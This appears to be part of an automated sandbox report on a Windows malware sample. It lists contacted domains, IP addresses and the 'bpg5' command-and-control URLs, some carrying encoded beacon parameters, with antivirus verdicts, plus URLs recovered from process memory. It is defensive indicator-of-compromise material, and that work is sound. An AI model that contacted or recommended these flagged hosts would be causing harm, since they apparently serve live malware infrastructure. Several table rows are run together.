            		truetrue
              		unknown
              www.jhg61.com
              		150.129.40.9
              		truetrueunknown
              musicandgros.com
              		81.169.145.93
              		truetrue
                		unknown
                www.haynicorpon.biz
                		183.90.228.46
                		truetrue
                  		unknown
                  www.musicandgros.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&jdd=UX4BZmtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.antalyabfe.com/bpg5/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZmtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.gomarketing.info/bpg5/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.haynicorpon.biz/bpg5/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.rt66omm.com/bpg5/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.rt66omm.com/bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuheTeyylBQBjx3TTw==&jdd=UX4BZmtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.gomarketing.info/bpg5/?yDcF=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCON7RUUDcju2gY5A==&jdd=UX4BZmtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.jhg61.com/bpg5/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.musicandgros.com/bpg5/?yDcF=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwSdmK2gNTOclalNw==&jdd=UX4BZmtrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.perkibeans.com/bpg5/explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sakkal.comwc)k535276_86376.exe, 00000000.00000003.394954432.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394806717.000000000552A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3explorer.exe, 00000006.00000002.668081280.0000000015A5C000.00000004.80000000.00040000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.wearecatalyst.app/bpg5/explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.techwithsun.com/bpg5/www.techwithsun.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.fontbureau.com/designers535276_86376.exe, 00000000.00000003.397689898.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.bisarropainting.com/bpg5/www.bisarropainting.comjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.thetowerbells.com/bpg5/explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.haynicorpon.bizexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.658237666.000000000613F000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.mysparexrewards.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.jiyu-kobo.co.jp/iefBy9k535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.perkibeans.com/bpg5/www.perkibeans.comjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.rt66omm.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.rt66omm.com/bpg5/www.rt66omm.comjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.gomarketing.infoexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.sajatypeworks.com535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cn/cThe535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.42230.org/bpg5/www.42230.orgjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.fontbureau.comgrita535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.perkibeans.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.galapagosdesign.com/staff/dennis.htmUc535276_86376.exe, 00000000.00000003.401946462.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402920758.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402387221.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402100753.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402736491.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402803455.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402286222.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402518001.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401712496.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401849366.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402580743.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402230354.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401996781.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401797396.000000000552A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.vns96.netexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/Y0fBy9k535276_86376.exe, 00000000.00000003.395423241.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394806717.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395858698.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395306359.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395605357.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395232130.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395760559.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395130788.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395686868.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395028815.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394954432.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395494589.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.galapagosdesign.com/DPlease535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deDPlease535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/_y535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.zhongyicts.com.cn535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.392270268.000000000552B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.fontbureau.com=535276_86376.exe, 00000000.00000003.397754379.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397432113.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397875370.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397211203.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398059523.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398106222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397485311.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397371212.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397689898.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://www.fontbureau.comtly/kt535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.comalsd535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399663332.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399737028.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000002.653229725.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.424757327.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://www.galapagosdesign.com/535276_86376.exe, 00000000.00000003.403003550.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402100753.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402920758.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402286222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401797396.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401712496.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401849366.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401946462.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401996781.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402387221.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.403191353.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402230354.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402518001.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402803455.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402580743.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.thetowerbells.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.gomarketing.info/bpg5/www.gomarketing.infojdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.mysparexrewards.com/bpg5/explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.jhg61.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.berlinhealthweek.com/bpg5/explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.fabricadepack.fun/bpg5/www.fabricadepack.funjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000006.00000000.446421182.00007FFA13109000.00000002.00000001.01000000.0000000A.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.bisarropainting.comADexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.42230.orgIexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/Iyk535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.vns96.net/bpg5/www.vns96.netjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.antalyabfe.com/bpg5/www.antalyabfe.comjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.fontbureau.comdsed:yqk535276_86376.exe, 00000000.00000003.397754379.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397875370.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398059523.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398106222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398600567.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397689898.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.carterandcone.coml535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.berlinhealthweek.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.fontbureau.comF:yqk535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designers/frere-jones.html535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.comoitu535276_86376.exe, 00000000.00000003.400549068.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400591702.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400807219.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400849610.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400656823.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400703336.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400308367.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400396259.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.jhg61.com/bpg5/www.jhg61.comjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
